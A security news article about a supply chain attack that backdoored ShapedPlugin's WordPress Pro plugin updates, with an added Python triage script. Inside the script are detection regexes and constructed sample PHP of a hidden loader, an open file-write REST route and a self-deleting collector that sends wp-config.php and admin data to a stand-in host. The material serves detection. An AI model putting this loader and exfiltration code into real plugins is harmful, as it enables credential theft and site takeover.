Supply Chain Attack Backdoors ShapedPlugin WordPress Pro Plugins

A supply chain attack on ShapedPlugin’s WordPress Pro plugins injected backdoors into official updates, enabling credential theft, persistence, and full site compromise across affected installations.

CSBadmin

Multiple WordPress plugins from ShapedPlugin have been compromised in a supply chain attack: unknown threat actors gained access to the vendor's build and distribution pipeline and injected backdoor functionality into official Pro releases. Security researchers at Wordfence report that the attackers tampered with the legitimate update mechanism itself, so customers received the malicious code through the vendor's own trusted update channel rather than from a third-party download.

The incident affects several premium plugins, including Product Slider Pro for WooCommerce (versions prior to 3.5.4), Real Testimonials Pro (version 3.2.5), and Smart Post Show Pro (versions before 4.0.2). The scope is limited to the Pro editions delivered through ShapedPlugin's own Easy Digital Downloads update infrastructure; the free versions distributed through WordPress.org are unaffected. That split matters: an administrator who checks only WordPress.org, or who assumes that updates arriving through the plugin's built-in updater are clean, may conclude a site is safe while its Pro installs have been pulling backdoored builds from the vendor's servers.

Once installed, the compromised plugins deploy a loader that runs on every WordPress admin page. The loader contacts a remote server to retrieve additional payloads, writes them to disk, and activates them as a hidden plugin designed to blend into the environment. The malware then reports the infected site back to the attacker's infrastructure, erases its installation traces to hinder detection, and hides itself from the WordPress plugin list. From there it harvests credentials, including plaintext administrator logins and two-factor authentication codes, and establishes persistence through a custom REST API endpoint that lets the attacker write arbitrary files or deploy a web shell.

Beyond access persistence, the malicious code includes a PHP component (“install-persistent.php”) that extracts highly sensitive system and business data: the full WordPress configuration file with database credentials and authentication keys, lists of administrator accounts with creation timestamps, SMTP credentials stored by popular mail plugins, and up to three months of WooCommerce order data including payment details. The file is deleted after execution, which further complicates forensic analysis. Researchers believe the attack is consistent with a compromised build pipeline rather than poisoning of individual released packages, a serious breakdown in software supply chain integrity.
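The behaviours described above (a loader that fetches and writes payloads, a plugin that hides itself from the plugin list, an attacker-reachable REST route, and an exfiltration script that is deleted after it runs) are concrete enough to triage for on disk. The following Python script is an added example for this page, not Wordfence's scanner or ShapedPlugin's code: it walks a plugins directory and scores each PHP file against heuristic patterns derived from the description above. The regexes, the `__return_true` permission-callback check, the `unlink(__FILE__)` self-deletion check, the `example.invalid` hostnames and the constructed sample plugins it scans are all assumptions of this example, not published indicators from the report. Because legitimate plugins also register REST routes and write files, a single hit is noise, so the script reports only files that combine two or more behaviours or show one of the stronger ones.

```python
"""Heuristic triage of a WordPress plugins directory for the loader/persistence
behaviours described above. Added example; the patterns are assumptions derived
from the write-up, not published indicators of compromise."""
from __future__ import annotations

import re
import tempfile
from pathlib import Path

# Each indicator is a regex over PHP source; the name says what a match suggests.
INDICATORS = {
    # add_filter('all_plugins', ...) is the hook a plugin uses to drop itself
    # from the admin plugin list.
    "hides_from_plugin_list": re.compile(r"add_filter\(\s*['\"]all_plugins['\"]"),
    "registers_rest_route": re.compile(r"register_rest_route\s*\("),
    # A REST route anyone can call: 'permission_callback' => '__return_true'
    "unauthenticated_rest_route": re.compile(
        r"permission_callback['\"]\s*=>\s*['\"]__return_true"),
    "remote_fetch": re.compile(
        r"wp_remote_(?:get|post|request)\s*\(|curl_init\s*\(|"
        r"file_get_contents\s*\(\s*['\"]https?://"),
    "writes_files": re.compile(r"file_put_contents\s*\(|\bfwrite\s*\("),
    "reads_wp_config": re.compile(r"wp-config\.php"),
    # Assumption: self-deletion implemented as unlink(__FILE__).
    "self_deletes": re.compile(r"unlink\s*\(\s*__FILE__\s*\)"),
    "persistent_installer": re.compile(r"install-persistent\.php"),
}
# Any one of these alone is worth a look even without a second hit.
STRONG = {"hides_from_plugin_list", "self_deletes", "persistent_installer"}


def scan_file(path: Path) -> list[str]:
    """Return the indicator names that match one PHP file."""
    text = path.read_text(errors="replace")
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    # The file name itself is an indicator, whatever the contents say.
    if path.name == "install-persistent.php" and "persistent_installer" not in hits:
        hits.append("persistent_installer")
    return hits


def triage(plugins_dir: str | Path, min_hits: int = 2) -> dict[str, list[str]]:
    """Map plugin-relative path -> sorted indicator names for files worth review.
    A file is reported if it combines min_hits behaviours or shows a STRONG one."""
    root = Path(plugins_dir)
    findings: dict[str, list[str]] = {}
    for path in sorted(root.rglob("*.php")):
        hits = scan_file(path)
        if len(hits) >= min_hits or STRONG & set(hits):
            findings[path.relative_to(root).as_posix()] = sorted(hits)
    return findings


# Constructed sample plugin sources (inert text, never executed): one benign
# plugin and a two-file look-alike of the behaviour the article describes.
SAMPLE_TREE = {
    "benign-widget/benign-widget.php": """<?php
/* Plugin Name: Benign Widget (constructed sample) */
add_action('rest_api_init', function () {
    register_rest_route('bw/v1', '/stats', [
        'methods' => 'GET',
        'callback' => 'bw_stats',
        'permission_callback' => function () { return current_user_can('manage_options'); },
    ]);
});
""",
    "cache-helper/loader.php": """<?php
/* Plugin Name: Cache Helper (constructed sample of a hidden loader) */
add_filter('all_plugins', function ($plugins) {
    unset($plugins['cache-helper/loader.php']);
    return $plugins;
});
add_action('admin_init', function () {
    $resp = wp_remote_get('https://example.invalid/payload');
    file_put_contents(WP_PLUGIN_DIR . '/cache-helper/stage2.php', wp_remote_retrieve_body($resp));
});
add_action('rest_api_init', function () {
    register_rest_route('ch/v1', '/w', [
        'methods' => 'POST',
        'callback' => 'ch_write_file',
        'permission_callback' => '__return_true',
    ]);
});
""",
    "cache-helper/install-persistent.php": """<?php
/* constructed sample of a self-deleting collector */
$cfg = file_get_contents(ABSPATH . 'wp-config.php');
$admins = get_users(['role' => 'administrator', 'fields' => ['user_login', 'user_registered']]);
wp_remote_post('https://example.invalid/report', ['body' => ['cfg' => $cfg, 'admins' => $admins]]);
@unlink(__FILE__);
""",
}


def build_sample_tree(base: Path) -> None:
    """Write the constructed sample plugins under base."""
    for rel, src in SAMPLE_TREE.items():
        target = base / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(src)


def demo() -> dict[str, list[str]]:
    """Write the constructed tree to a temp dir and triage it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(Path(tmp))
        return triage(tmp)


if __name__ == "__main__":
    for rel, hits in demo().items():
        print(f"{rel}: {', '.join(hits)}")
```

Against a real site, call `triage('/var/www/html/wp-content/plugins')` (path assumed) and treat every reported file as a lead for manual review, not a verdict. A clean result does not rule out a payload dropped outside the plugins directory or one whose strings are obfuscated, so pair it with the credential rotation and account review the vendor guidance calls for.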

The issue has been assigned CVE-2026-49777 (CVSS 10.0) and CVE-2026-10735 (CVSS 9.8), reflecting maximum severity and systemic impact. ShapedPlugin has acknowledged the incident and says it is auditing its build and release processes before issuing clean updates. Administrators running affected plugin versions are advised to treat the site as compromised: rotate every credential the site holds (administrator passwords, the database password, the authentication keys in wp-config.php, and any SMTP credentials), revoke and regenerate 2FA secrets, review administrator accounts for unauthorized additions or changes, and verify SMTP and plugin configurations for tampering. Because persistence lives in a separately installed hidden plugin and a custom REST endpoint, updating or deleting the affected Pro plugin alone does not remove the attacker's access.

SOURCES:The Hacker News